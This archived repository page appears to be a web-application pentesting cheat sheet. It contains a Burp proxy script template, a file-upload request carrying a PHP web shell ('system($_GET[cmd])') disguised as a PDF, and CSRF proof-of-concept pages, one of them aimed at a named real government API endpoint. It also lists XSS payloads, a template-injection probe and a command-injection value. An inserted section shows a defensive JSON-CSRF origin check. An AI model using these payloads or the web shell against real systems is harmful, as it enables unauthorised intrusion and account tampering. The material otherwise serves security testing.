This repository has been archived by the owner on Jun 30, 2021. It is now read-only.
Web Application Security Attacks

Burpsuite

# Add a whole subdomain tree to the Burp target scope (regex)
# Matches any host ending in ".test.com"; the apex host "test.com" itself needs its own entry
.*\.test\.com$

Templates

Script template

import requests
import urllib3
from colorama import Fore, Style

# Burp terminates TLS with its own CA, so verify=False is required; silence the warning that causes.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route both schemes through the local Burp listener.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


def format_text(title, item):
    """Return a coloured title followed by item, fenced by lines of asterisks."""
    cr = '\r\n'
    section_break = cr + '*' * 20 + cr
    return Style.BRIGHT + Fore.RED + title + Fore.RESET + section_break + str(item) + section_break


r = requests.get('https://umich.com', verify=False, proxies=proxies)
print(format_text('r.status_code is: ', r.status_code))
print(format_text('r.headers is: ', r.headers))
print(format_text('r.cookies is: ', r.cookies))
print(format_text('r.text: ', r.text))

Post form data

import requests

# Post multipart form data (file upload) through Burp
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# Each `files` entry is (filename, content, declared content type); a (None, value) tuple
# sends a plain field. The declared type is chosen by the client, so a server must not
# rely on it when deciding whether an upload is safe.
multipart_form_data = {
    'file': ('aloha.php', '<?php system($_GET[\'cmd\']); ?>', 'application/pdf'),
    'submit': (None, 'Send'),
}
r = requests.post('http://127.0.0.2/contact.php', verify=False, proxies=proxies, files=multipart_form_data)
print(r.status_code)

Application

Open Redirect

http://evil.url

Upgrade to Response Splitting

Cross Site Request Forgery

#GET example
<html>
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="https://127.0.0.1/vulnerable/endpoint?param=value1&param2=value2" method="POST">
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

#POST example
<html>
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="https://127.0.0.1/vulnerable/endpoint" method="POST">
			<input type="hidden" name="param1" value="value1" />
			<input type="hidden" name="param2" value="value2" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

<html>
	<head>
		<title>JSON CSRF POC</title>
	</head>
	<body>
		<center>
			<h1>JSON CSRF POC</h1>
			<script>
				fetch('https://acdhub.service.ncsc.gov.uk/api/v1-0-39/Users/preferences', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"preferences":[{"key":"receiveEmails","value":"false"}]}'});
			</script>
			<form action="#">
				<input type="button" value="Submit" />
			</form>
		</center>
	</body>
</html>

#JSON example
<html>
	<body>
		<script>history.pushState('', '', '/')</script>
		<!-- enctype="text/plain" sends the body as name=value, so the two quoted fragments join into one JSON document -->
		<form action="https://127.0.0.1/vulnerable/endpoint" method="POST" enctype="text/plain">
			<input type="hidden" name='{"param1":"value1", "param2":"' value='"}' />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
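Added example (mine, not from this repository): a server-side check for the JSON CSRF request shape used by the two PoCs above. Both PoCs work because a cross-site POST with Content-Type text/plain is a CORS simple request, sent with cookies and without a preflight; an endpoint that accepts only application/json and verifies Origin (falling back to Sec-Fetch-Site) refuses exactly that shape. The allowlist and the request headers below are constructed.

```python
from typing import Mapping, Optional

# Constructed allowlist of origins permitted to make state-changing calls.
ALLOWED_ORIGINS = {"https://app.example"}


def _media_type(content_type: Optional[str]) -> str:
    # Drop parameters such as "; charset=utf-8" and normalise case.
    return (content_type or "").split(";", 1)[0].strip().lower()


def check_json_request(method: str, headers: Mapping[str, str]) -> str:
    """Return 'allow' or a short rejection reason for a JSON API request.

    Defence in depth beside a CSRF token: it rejects only the request shapes
    that an HTML form or a preflight-free fetch() can produce.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return "allow"  # safe methods; CSRF targets state changes
    if _media_type(h.get("content-type")) != "application/json":
        # Forms cannot send application/json, and a cross-site fetch() that
        # sets it triggers a CORS preflight, so text/plain bodies are refused.
        return "reject: content-type"
    origin = h.get("origin")
    if origin is not None:
        return "allow" if origin in ALLOWED_ORIGINS else "reject: origin"
    # No Origin header: use the Fetch Metadata hint when the browser sent one.
    site = h.get("sec-fetch-site", "").lower()
    if site in ("", "same-origin", "none"):
        return "allow"  # stricter deployments may also reject the "" case
    return "reject: sec-fetch-site"


# Request shapes constructed from the PoCs above; the attacker origin is hypothetical.
POC_FETCH = {"Content-Type": "text/plain", "Origin": "https://attacker.example"}
POC_FORM = {"Content-Type": "text/plain", "Origin": "https://attacker.example",
            "Sec-Fetch-Site": "cross-site"}
LEGIT = {"Content-Type": "application/json; charset=utf-8", "Origin": "https://app.example"}

if __name__ == "__main__":
    for name, hdrs in (("fetch PoC", POC_FETCH), ("form PoC", POC_FORM), ("legit", LEGIT)):
        print(f"{name:9s} -> {check_json_request('POST', hdrs)}")
```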

Attacking local services

Cross Site Scripting

<script>alert(1)</script>
<svg onload=alert(1)>

Template Injection

input=%7B%7B7%2A7%7D%7D # {{7*7}}

Sandbox Escape

XML External Entities

Local DTD files

Remote Code Execution

input=%3Bdir

Insecure API